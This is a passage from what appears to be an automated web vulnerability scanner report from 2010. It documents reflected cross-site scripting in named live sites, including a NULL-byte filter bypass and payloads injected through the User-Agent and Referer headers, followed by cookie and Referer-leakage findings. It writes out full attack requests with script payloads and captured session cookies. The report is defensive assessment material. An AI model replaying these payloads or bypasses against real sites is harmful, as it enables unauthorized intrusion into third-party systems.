Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 378

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/tour/how_it_works.seam%00129c6<script>alert(1)</script>20e470b2f16</code>
...[SNIP]...

4.610. http://www.videobox.com/beta/tourPages/std_browse_page.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tourPages/std_browse_page.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b4bc<script>alert(1)</script>924e415b5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta3b4bc<script>alert(1)</script>924e415b5c/tourPages/std_browse_page.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 382

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta3b4bc<script>alert(1)</script>924e415b5c/tourPages/std_browse_page.seam</code>
...[SNIP]...

4.611. http://www.videobox.com/beta/tourPages/std_browse_page.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tourPages/std_browse_page.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54487<script>alert(1)</script>8aa5db948aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta/tourPages54487<script>alert(1)</script>8aa5db948aa/std_browse_page.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 383

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/tourPages54487<script>alert(1)</script>8aa5db948aa/std_browse_page.seam</code>
...[SNIP]...

4.612. http://www.videobox.com/beta/tourPages/std_browse_page.seam [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/tourPages/std_browse_page.seam

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload %00c6aa6<script>alert(1)</script>7731a923e6e was submitted in the REST URL parameter 3. This input was echoed as c6aa6<script>alert(1)</script>7731a923e6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/tourPages/std_browse_page.seam%00c6aa6<script>alert(1)</script>7731a923e6e HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 386

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta/tourPages/std_browse_page.seam%00c6aa6<script>alert(1)</script>7731a923e6e</code>
...[SNIP]...

4.613. http://devoxx.com/display/Devoxx2K10/Home [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 49b96--><script>alert(1)</script>084813ce49c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Home HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49b96--><script>alert(1)</script>084813ce49c
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:25:30 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289841930455
Set-Cookie: JSESSIONID=D6250C90DE179FF993042D57982309ED; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38259

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49b96--><script>alert(1)</script>084813ce49c'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...

4.614. http://m1055.ic-live.com/840/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://m1055.ic-live.com
Path:   /840/

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e68c1"><script>alert(1)</script>d19b8ae221 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /840/?97665914&OVMTC=Broad&site=&creative=6185975832&OVKEY=internet%20file%20storage&url_id=97665914/x22 HTTP/1.1
Host: m1055.ic-live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e68c1"><script>alert(1)</script>d19b8ae221
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Mosso Engineering)
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 09:41:04 GMT
Keep-Alive: timeout=15, max=144
Connection: close
Set-Cookie: symfony=v6cl1ablgso080tls46odssno6; path=/
X-Powered-By: PHP/5.2.6
Content-Length: 34584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" id="windows">
<head>
<meta
...[SNIP]...
p;optionaldata2=/cloud_hosting_products/files?CMP=Google_internet+file+storage_broad&amp;optionaldata3=cleanEntry&amp;optionaldata4=&amp;optionaldata5=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e68c1"><script>alert(1)</script>d19b8ae221&amp;optionaldata6=v6cl1ablgso080tls46odssno6','custclient','width=460,height=300,scrollbars=0'); return false;">
...[SNIP]...

4.615. http://storegrid.vembu.com/cgi-bin/automail [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /cgi-bin/automail

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5608"><script>alert(1)</script>18e5412b04a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/automail HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;
Referer: http://www.google.com/search?hl=en&q=c5608"><script>alert(1)</script>18e5412b04a

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:52:17 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: text/html
Content-Length: 1088

<HTML><HEAD><TITLE>WebMonitor-Email Form</TITLE></HEAD><BODY>
<H1>storegrid.vembu.com <A HREF="http://hoohoo.ncsa.uiuc.edu/webmonitor/module-mail.html">Email Form</A></H1>
<FORM METHOD="POST" ACTION="
...[SNIP]...
<INPUT TYPE="hidden" NAME="ignore:previous-url" VALUE="http://www.google.com/search?hl=en&q=c5608"><script>alert(1)</script>18e5412b04a">
...[SNIP]...

4.616. http://storegrid.vembu.com/cgi-bin/mail [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /cgi-bin/mail

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9392a"><script>alert(1)</script>32a9a9edea3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/mail?download HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;
Referer: http://www.google.com/search?hl=en&q=9392a"><script>alert(1)</script>32a9a9edea3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:55:19 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: text/html
Content-Length: 802

<HTML><HEAD><TITLE>WebMonitor-Email Form</TITLE></HEAD><BODY>
<H1>storegrid.vembu.com <A HREF="http://hoohoo.ncsa.uiuc.edu/webmonitor/module-mail.html">Email Form</A></H1>
<FORM METHOD="POST" ACTION="
...[SNIP]...
<INPUT TYPE="hidden" NAME="ignore:previous-url" VALUE="http://www.google.com/search?hl=en&q=9392a"><script>alert(1)</script>32a9a9edea3">
...[SNIP]...

4.617. http://www.videobox.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 488a7'-alert(1)-'f7249ced5df was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=488a7'-alert(1)-'f7249ced5df
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.videobox.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:09:20 GMT
Set-Cookie: JSESSIONID=2459E3E094AA19E4F42768DC7977C794; Path=/
Set-Cookie: state=1-1289830160662-0-4133; Expires=Sat, 25-Oct-2014 14:09:20 GMT; Path=/
Set-Cookie: ref=687474703a2f2f7777772e676f6f676c652e636f6d2f7365617263683f686c3d656e26713d3438386137272d616c6572742831292d276637323439636564356466; Path=/
Set-Cookie: partner=internal; Expires=Tue, 15-Nov-2011 14:09:20 GMT; Path=/
Set-Cookie: state=1-1289830160662-0-4133; Expires=Sat, 25-Oct-2014 14:09:20 GMT; Path=/
Set-Cookie: use_yf=false; Path=/
Set-Cookie: use_gf=false; Path=/
Set-Cookie: state=1-1289830160662-0-4133; Expires=Sat, 25-Oct-2014 14:09:20 GMT; Path=/
Set-Cookie: tc=H4sIAAAAAAAAAI2QMW7DMAxF5+QUAodujSw5VuQ0yim6G7LNOgIsy5XouLl9lQSd2qETgU8+8n+eqGPD4vpmRJvQwKveq1oWVaFlpfalqISu4DnhQyIDUmt1kELWlRa10gchSmBdREvYGxBS17oshCqUksBmlzU3EcbJjsA+XEzULHE0cCGaj5yv67q7uh5DG752XfC8RbKcwhJ5G8OacJfQ+h/yc8F4M5CW9t225hI8vlg/v3nrprvwJB5Slw/LQpSHu3uXmid/cTkAxQWBXTHmLLn2kwFglBsFnLebzYm6ps8m3MjoNuePiNx1Hn9ly1vHMAz31I+V/E9a/p8+cerO228/w0HikQEAAA--; Expires=Sun, 26-Oct-2014 14:09:20 GMT; Path=/
Set-Cookie: state=1-1289830160664-0-4133; Expires=Sat, 25-Oct-2014 14:09:20 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-Meta: S=app10
User-Header: X-Meta: S=app10
Link: </images/videobox/labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-cache, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 94325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<head>
<meta h
...[SNIP]...
<script type="text/javascript">
var utri, utti, utpi, utvi, utui;
utri = 'www.google.com'+'.'+
'/search'+'.'+
'hl=en&q=488a7'-alert(1)-'f7249ced5df';
utti = 'Default'+'.'+
'VideoBox'+'.'+
'10';
utpi = 'Internal'+'.'+
'internal'+'.'+
'1';
utvi = 'Bundle_3_-_No_Prepaid_Bundles'+'.'+
'4133';
utui = 'None'
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www.partsallover.com.au/home  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.partsallover.com.au
Path:   /home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.partsallover.com.au
Pragma: no-cache

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:00:19 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=07B4E2720CDB0DEE7924074FE09BD4C4; Path=/
Set-Cookie: com.base2.pao.anonymous.anonuser=8cbc9070-f6ad-437b-8b47-851d57d7334d; Path=/
Connection: close
Content-Length: 20889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link class="component" hr
...[SNIP]...

5.2. http://www.videobox.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.videobox.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Community/SeamInProduction
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.videobox.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 15 Nov 2010 16:00:13 GMT
Set-Cookie: JSESSIONID=F0275684DD9E842DD55CB300287AB2BA; Path=/
Set-Cookie: state=1-1289836813565-0-4133; Expires=Sat, 25-Oct-2014 16:00:13 GMT; Path=/
Set-Cookie: ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; Path=/
Set-Cookie: partner=internal; Expires=Tue, 15-Nov-2011 16:00:13 GMT; Path=/
Set-Cookie: state=1-1289836813566-0-4133; Expires=Sat, 25-Oct-2014 16:00:13 GMT; Path=/
Set-Cookie: use_yf=false; Path=/
Set-Cookie: use_gf=false; Path=/
Set-Cookie: state=1-1289836813566-0-4133; Expires=Sat, 25-Oct-2014 16:00:13 GMT; Path=/
Set-Cookie: tc=H4sIAAAAAAAAAI2Py27DIBBF18lXoNnHGBMorkx+xfJj6iBh48A4bv4+tFFX7aKrke7j6E5DA5s2N7Yeu4QWTkpW2pRCCV2qWp2NVCW8EnNIZEEJqd60OQupK2lqXQsDbIjYEY4WRGVqI7XJIa2BrS5rbiGMS+eBfbiYqN2it3AlWt853/e9uLsRQx8+iyHMvEfqeB/DnrBI2M0/pduG8WFh2XzmuNS+1KvLiyhuCOyO0UKV77hYAEbZKOFyPBwaGtoxU51n9FjziyK7bsZfYzPVh2n6euMbyf9sV/9vN5yGy/EJCbh9NmIBAAA-; Expires=Sun, 26-Oct-2014 16:00:13 GMT; Path=/
Set-Cookie: state=1-1289836813567-0-4133; Expires=Sat, 25-Oct-2014 16:00:13 GMT; Path=/
Location: http://www.videobox.com/beta/tour/browse.seam?subTab=home&mainTab=browse&cid=2032704
Vary: Accept-Encoding,User-Agent
X-Meta: S=app10
User-Header: X-Meta: S=app10
Link: </images/videobox/labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-cache, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 0


6. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xwiki/bin/export/Main/WebHome?format=xar&name=Main.WebHome&pages=Main.WebHome& HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:15:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12975
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<div class="rightmenu"><a id="tmDoc" href='http://www.xwiki.org/xwiki/bin/view/Main/Documentation' onclick="openURL('http://www.xwiki.org/xwiki/bin/view/Main/Documentation', '_blank'); return false;"><strong>
...[SNIP]...

6.2. http://www.nuxeo.org/xwiki/bin/export/skins/toucan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xwiki/bin/export/skins/toucan?format=xar&name=skins.toucan&pages=skins.toucan& HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
